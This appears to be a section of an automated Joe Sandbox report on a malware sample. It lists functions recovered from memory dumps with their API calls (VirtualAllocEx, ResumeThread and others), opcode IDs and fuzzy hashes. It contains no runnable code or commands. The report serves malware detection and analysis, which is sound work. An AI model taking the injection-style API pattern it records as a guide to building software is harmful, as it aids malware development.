                                                                                Function 06FDAFA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FDB016
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 3aa314ce2c54a3a44732a3afa227e53caa3020d1fdfc6d4afdf14eb1d01676b1
                                                                                • Instruction ID: 032febc194007a763a009bde8ebb78eb8cc016ef1594c4b192665068f2c34079
                                                                                • Opcode Fuzzy Hash: 3aa314ce2c54a3a44732a3afa227e53caa3020d1fdfc6d4afdf14eb1d01676b1
                                                                                • Instruction Fuzzy Hash: 621137B19003499FCB10DFAAC845ADFBFF6EF88320F248419E519A7250CB75A954DFA1
                                                                                Function 06FDA9E0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 0491c606f029413b3cf3c6141e5ecb132182f9c619e5a0b2b44c72c3c0a0f39d
                                                                                • Instruction ID: 4eefdbbf2ce6844b7b0d1af6ef869a484ae2ad4a21ba2fc7105d2e0e6ca5005e
                                                                                • Opcode Fuzzy Hash: 0491c606f029413b3cf3c6141e5ecb132182f9c619e5a0b2b44c72c3c0a0f39d
                                                                                • Instruction Fuzzy Hash: DE1158B1D002498FDB10DFAAC4447EEFBF5EF88324F24841AD119A7240CB756545CB94
                                                                                Function 06FDA9E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: edf7eefd4d6f9fbec5c9f71dbfa8ce9d3f3660a88415a9a77e81d0335b7583f3
                                                                                • Instruction ID: a1a34dcb487974c785e3161d333a95c96771ff1e35d8982b34c48e0e82d835da
                                                                                • Opcode Fuzzy Hash: edf7eefd4d6f9fbec5c9f71dbfa8ce9d3f3660a88415a9a77e81d0335b7583f3
                                                                                • Instruction Fuzzy Hash: 321136B1D003488FDB10DFAAC8457DEFBF5EB88324F24841AD519A7240CB79A944CFA5
                                                                                Function 0110B4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: b2f83bd5a88cf4f77f532aa39df90c6ccdfcb476c2590b9e3aa9165a934bd885
                                                                                • Instruction ID: 95e02efe0dffe06315eafd52f87acfdb90df1d42b072aa9f20f75bb093c11ef4
                                                                                • Opcode Fuzzy Hash: b2f83bd5a88cf4f77f532aa39df90c6ccdfcb476c2590b9e3aa9165a934bd885
                                                                                • Instruction Fuzzy Hash: 22110FB5C003498FDB14DF9AC444ADEFBF4EB89324F10845AD519B7250C3B9A545CFA5
                                                                                Function 06FDEF68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FDF655
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: a0080e564b9f6b3f8f57fb52f522260bad2d2f044c7a4a6a2354c780c8a25c03
                                                                                • Instruction ID: d2a3ea619842659710bd41fd6e852df0fffe4c2fe66faa47f763da416bb41af2
                                                                                • Opcode Fuzzy Hash: a0080e564b9f6b3f8f57fb52f522260bad2d2f044c7a4a6a2354c780c8a25c03
                                                                                • Instruction Fuzzy Hash: 4C1122B5800348DFDB10DF8AC948BDEBBF8EB49320F20845AE519A3610C375A944CFA1
                                                                                Function 0106D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722437843.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_106d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02aeb19829fa60a4439d8ae7ad3882d4c41226b51a5a359508789efce3e77e3e
                                                                                • Instruction ID: 66efd0c81d8aa0e50ca91b85a4c2d1d91df4f379d0b403f2c765678632fe44eb
                                                                                • Opcode Fuzzy Hash: 02aeb19829fa60a4439d8ae7ad3882d4c41226b51a5a359508789efce3e77e3e
                                                                                • Instruction Fuzzy Hash: 92212871604240DFDB05DF58D9C0B2ABFA9FB88318F24C5A9D9890B656C336D456C7A1
                                                                                Function 0106D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722437843.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_106d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e77126fc5df5d9745f1615bbe5b0634a3014add2793b1710eafaff4709e04e4
                                                                                • Instruction ID: 1db7f30d3281e211e2bba2188c18aae15f4f477fe2fb14f8f803e62253b4f0be
                                                                                • Opcode Fuzzy Hash: 9e77126fc5df5d9745f1615bbe5b0634a3014add2793b1710eafaff4709e04e4
                                                                                • Instruction Fuzzy Hash: 88214B71600244DFDB01DF44C9C0B56BFA9FB98324F24C5ADD98A0B246C736E816C7A1
                                                                                Function 0107D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722484629.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_107d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35d77db530b80505251a14c750affa53f2afe8e606d36e459aa1d9be5adad7a1
                                                                                • Instruction ID: f393caf8f80da3f9f2cc756374cbb43f1d270382ce4749607258fa23f11b9740
                                                                                • Opcode Fuzzy Hash: 35d77db530b80505251a14c750affa53f2afe8e606d36e459aa1d9be5adad7a1
                                                                                • Instruction Fuzzy Hash: 8821F571A04200EFDB05DF98D9C4B25BBA5FF94324F24C6ADD98A4B252C336D407CB65
                                                                                Function 0107D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722484629.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_107d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6a4eec76f0c357d5547d964ae3d20489aff49c703dbff85c4ea4d1caf1dcc1
                                                                                • Instruction ID: 50452b8e8bc483d83a83cff2840f7917b4a67d8beb56fc814440e6ade7fdb27d
                                                                                • Opcode Fuzzy Hash: 8c6a4eec76f0c357d5547d964ae3d20489aff49c703dbff85c4ea4d1caf1dcc1
                                                                                • Instruction Fuzzy Hash: 17210375A04200DFCB16DF58D984B16BBA5EF84314F24C9ADE98A0B242C336D407CBA1
                                                                                Function 0107D006 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722484629.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_107d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 596371d9e6db6eea60e05a184fc45ed029809dec83d477d755f3bb90bd5ab719
                                                                                • Instruction ID: 9d26f8f2a375b2d17d0cbf0288df8a63865858e428fbe5173df689122ee25e0e
                                                                                • Opcode Fuzzy Hash: 596371d9e6db6eea60e05a184fc45ed029809dec83d477d755f3bb90bd5ab719
                                                                                • Instruction Fuzzy Hash: 402187755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F6A7C33A980ACBA2
                                                                                Function 0106D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722437843.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_106d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction ID: 914a36559e40f466dc25349bc394c74dc1eb2be1943079c5790016582577783f
                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction Fuzzy Hash: 61110376604240CFDB02CF44D5C4B56BFB2FB84324F24C2A9D9890B257C33AE85ACBA1
                                                                                Function 0106D4BF Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722437843.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_106d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction ID: b0c1f960a2c5f4feb9e7ad51ac37fbe97e3b69d26fe71537e2011e8b6d99b230
                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                • Instruction Fuzzy Hash: 7811D376A04280CFDB16CF54D5C4B16BFB2FB84324F24C6A9D9890B657C336D45ACBA1
                                                                                Function 0107D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722484629.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_107d000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction ID: c403a41d9e0b5b4f9a6990dc20e082962c936bd1ceb1980e25aa1cf2fc017d94
                                                                                • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction Fuzzy Hash: 1F11A975904280DFDB02CF54C5C4B15BBA2FB84224F28C6A9D8894B296C33AD40BCB61
                                                                                Function 07090D58 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729874421.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7090000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bb00ac495cfea946fc79938eb9ff7505400510aa9af7ac5eb9afa75938f5e19c
                                                                                • Instruction ID: e431567294ef28474dd6e9307835342ab7beded4a1c40ba15f127c6eeaeda0c1
                                                                                • Opcode Fuzzy Hash: bb00ac495cfea946fc79938eb9ff7505400510aa9af7ac5eb9afa75938f5e19c
                                                                                • Instruction Fuzzy Hash: 341109B0D0925ADFCB519FB494487FDBFF0AB46301F1485AAD4A5A7292D3748A44DB10
                                                                                Function 07090D68 Relevance: .0, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729874421.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7090000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ffb0da9e0fd9de8835a1ea46cf15d0593cf57183738e4ab4507125e69b39fff
                                                                                • Instruction ID: 63e5f9b5f6d108e3e9fffef4b3b661831ac9cc76694b4ca90d9086d0348c068b
                                                                                • Opcode Fuzzy Hash: 8ffb0da9e0fd9de8835a1ea46cf15d0593cf57183738e4ab4507125e69b39fff
                                                                                • Instruction Fuzzy Hash: 66011AB0D0521AEFCB14DFA5C8087FDBBF0BB4A301F0485A99465A3291D7789A44DF54
                                                                                Function 07090DE4 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729874421.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7090000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d4df052adfffb502592b45a37b8732fd4ca3058d48f292d728cb9f675fce234
                                                                                • Instruction ID: b4af9c7dff4ada7fba51da02c95d9ef5997de35cb4242071b1757840f45887d5
                                                                                • Opcode Fuzzy Hash: 0d4df052adfffb502592b45a37b8732fd4ca3058d48f292d728cb9f675fce234
                                                                                • Instruction Fuzzy Hash: 5EF0B4B0D09265DFCB018FA5D8545BCBFB0EB4B202F0481E6E495A7292D2399644EB10

                                                                                Non-executed Functions

                                                                                Function 06FD80BE Relevance: .4, Instructions: 350COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 373dfbde02a39f2b5c5ad0d2908779386fda93eeeb43b7480590c37ccb34e6f1
                                                                                • Instruction ID: abe382ddcce4ef75ea3ed323e35fed93773aa728b8f53a754db0e6baa24099df
                                                                                • Opcode Fuzzy Hash: 373dfbde02a39f2b5c5ad0d2908779386fda93eeeb43b7480590c37ccb34e6f1
                                                                                • Instruction Fuzzy Hash: F0E13D74E012598FCB14DFA9C5809AEFBB2FF89304F288169D415AB356D731AD42CFA1
                                                                                Function 06FD17A8 Relevance: .3, Instructions: 313COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d7a7a145ec8d320013928648830c0515928b160ba3377277e1dc9824ccb4d18
                                                                                • Instruction ID: ff8d4bfb6d365abd88bd4d332cdd1f1757528bd9df913861525fb38c55fc98d5
                                                                                • Opcode Fuzzy Hash: 0d7a7a145ec8d320013928648830c0515928b160ba3377277e1dc9824ccb4d18
                                                                                • Instruction Fuzzy Hash: 4AD1E471E09219DF9B48CFAAD98059EFBF2BF89300F18952AD415AB224D734A942CF54
                                                                                Function 06FD8538 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbe077b93c7fc761f2a624ebc8f423f3848c5fb5d06e34f66e74f77336b8537f
                                                                                • Instruction ID: 2064359877bc182cb50f5495a7235d9e740eb828a858ba5dca4d52fd7b161513
                                                                                • Opcode Fuzzy Hash: fbe077b93c7fc761f2a624ebc8f423f3848c5fb5d06e34f66e74f77336b8537f
                                                                                • Instruction Fuzzy Hash: A1E10A74E002198FCB54DFA9C5809AEFBB2FF89304F248169E419AB355D731AD42CFA1
                                                                                Function 06FDA1C0 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54f1a5d3793b0f7de19300a281f68c9d9828dd7387dabea56b8f43a3216e7138
                                                                                • Instruction ID: 962ae3317c0832cdfd0e94c93ea0fe999d0b693e18b06eea855360838393567c
                                                                                • Opcode Fuzzy Hash: 54f1a5d3793b0f7de19300a281f68c9d9828dd7387dabea56b8f43a3216e7138
                                                                                • Instruction Fuzzy Hash: 31E1FB74E002198FDB14DFA9C5809AEFBF2FF89304F288169E415AB355DB31A942CF65
                                                                                Function 06FDAA98 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 56ad79d592505e5b724512ac8344177c3e8db4b553a6dfdee449f3d803c30748
                                                                                • Instruction ID: 320c6db9d13409185e752502a5075257c2cfe694c09bbc3c3404b3de11dc7bf6
                                                                                • Opcode Fuzzy Hash: 56ad79d592505e5b724512ac8344177c3e8db4b553a6dfdee449f3d803c30748
                                                                                • Instruction Fuzzy Hash: 03E1FB74E002198FDB14DFA9C5809AEFBF2FF89304F248169D419AB355DB31A942CFA5
                                                                                Function 06FD8970 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be2d1576ac42101fc35108d915f02a0c0992b5789a31193b9e935a83999093e7
                                                                                • Instruction ID: a2c87b05406ee20321943892821dcf36ec054269af346b60a56fd2e0cc9a6502
                                                                                • Opcode Fuzzy Hash: be2d1576ac42101fc35108d915f02a0c0992b5789a31193b9e935a83999093e7
                                                                                • Instruction Fuzzy Hash: 3AE10B74E012198FDB14DFA9C5809AEFBB2FF89304F248269D419AB355D731A942CF61
                                                                                Function 06FD1798 Relevance: .3, Instructions: 311COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bcd53eb1c406ec468631f7a486e1cd9659e1741706dee1c98dcfd43b7b4a1eda
                                                                                • Instruction ID: e9c240a22c43633520367260e4ca097f3e3e9a3ce085e128925905feb79235a2
                                                                                • Opcode Fuzzy Hash: bcd53eb1c406ec468631f7a486e1cd9659e1741706dee1c98dcfd43b7b4a1eda
                                                                                • Instruction Fuzzy Hash: 58D1D371E09219DFDB48CFAAD98059EFBF2BF89300F18952AD415EB224D734A942CF54
                                                                                Function 06FD1270 Relevance: .3, Instructions: 274COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cd5f7abf8f7d20082966c6dd6ec31a98e535ef94ace9df9cd6bfd984c795a5ed
                                                                                • Instruction ID: f81b085de52e600937b79388f58d4d9229f947130632edade4b25dccb21bbc37
                                                                                • Opcode Fuzzy Hash: cd5f7abf8f7d20082966c6dd6ec31a98e535ef94ace9df9cd6bfd984c795a5ed
                                                                                • Instruction Fuzzy Hash: BEB12475E04219DFEB58CFE6D88059EFBB6FF89300F24942AD415AB264DB35A902CF44
                                                                                Function 06FD1260 Relevance: .3, Instructions: 274COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f8be9e12307bf926b9410ab22c81409237b98389b5d52b99e8bafa1b1212571d
                                                                                • Instruction ID: 55a7b66f7eb3420c559aced479ba61a0671023f35bf9a0b1167239e62ccfc1a8
                                                                                • Opcode Fuzzy Hash: f8be9e12307bf926b9410ab22c81409237b98389b5d52b99e8bafa1b1212571d
                                                                                • Instruction Fuzzy Hash: F2B13576E04219DFDB58CFE6D88059EFBB2BF89300F24942AD415EB264DB35A902CF44
                                                                                Function 0110E12C Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0dbe731dd0ed5b8e7e361eaa70ad24d564bb3770c41f2fafb10e916d7b0ed5cf
                                                                                • Instruction ID: 7871fbc9e00c023bfedc93a39bec4cddfbccc2914a61932a7d89bca2c206f2c5
                                                                                • Opcode Fuzzy Hash: 0dbe731dd0ed5b8e7e361eaa70ad24d564bb3770c41f2fafb10e916d7b0ed5cf
                                                                                • Instruction Fuzzy Hash: 9BA18132E00216DFCF1ADFB5C8404DEBBB2FF85304B15456AE905AB2A5DB71D956CB40
                                                                                Function 06FD0270 Relevance: .3, Instructions: 252COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d770573a2551dfd8a8462e61356cc3978538621d06b5320f200fa7d459d5d3a
                                                                                • Instruction ID: d4783126a31adf55395bd657dfaa338cc2a6b6a792c4417ecbe48572811cea85
                                                                                • Opcode Fuzzy Hash: 6d770573a2551dfd8a8462e61356cc3978538621d06b5320f200fa7d459d5d3a
                                                                                • Instruction Fuzzy Hash: 00B11A70E152198FDB54DFA9C5809AEFBB3FF89304F248169D409AB355DB30A942CFA1
                                                                                Function 06FD0261 Relevance: .2, Instructions: 246COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d30be46be7e7f0c925f7a802af19a99dc2539d0e4edc2361fde3430f4edaede6
                                                                                • Instruction ID: 1b478e3216375cb5d74f0872d323a410379fac259ddc0abc5332e31fcea3b3ba
                                                                                • Opcode Fuzzy Hash: d30be46be7e7f0c925f7a802af19a99dc2539d0e4edc2361fde3430f4edaede6
                                                                                • Instruction Fuzzy Hash: 89B12A70E152198FDB54DFA9C5809AEFBB3FF89304F28816AD409A7355DB30A941CFA1
                                                                                Function 06FD031B Relevance: .2, Instructions: 211COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10ac5b7cfb90d21922c95ece3bb764f684459c5a411fcca6bc03016e1e345869
                                                                                • Instruction ID: a3a7180c5dd0584a2cfec20eb8d5ececc97967038ba729f813587721794a4f2c
                                                                                • Opcode Fuzzy Hash: 10ac5b7cfb90d21922c95ece3bb764f684459c5a411fcca6bc03016e1e345869
                                                                                • Instruction Fuzzy Hash: 5CA12C74E152198FDB54DFA8C5809AEFBB3FF89304F289199D809A7316D730A981CF61
                                                                                Function 06FD8960 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab37f0a7dcb838e23bdfe30f64d8b4ec8f25b7674535a30bb79f6f51a59af2ff
                                                                                • Instruction ID: d7117f377595a1cc97d012fdb414d32c2be00938dfcaf3a6f3b2766eccc04e9b
                                                                                • Opcode Fuzzy Hash: ab37f0a7dcb838e23bdfe30f64d8b4ec8f25b7674535a30bb79f6f51a59af2ff
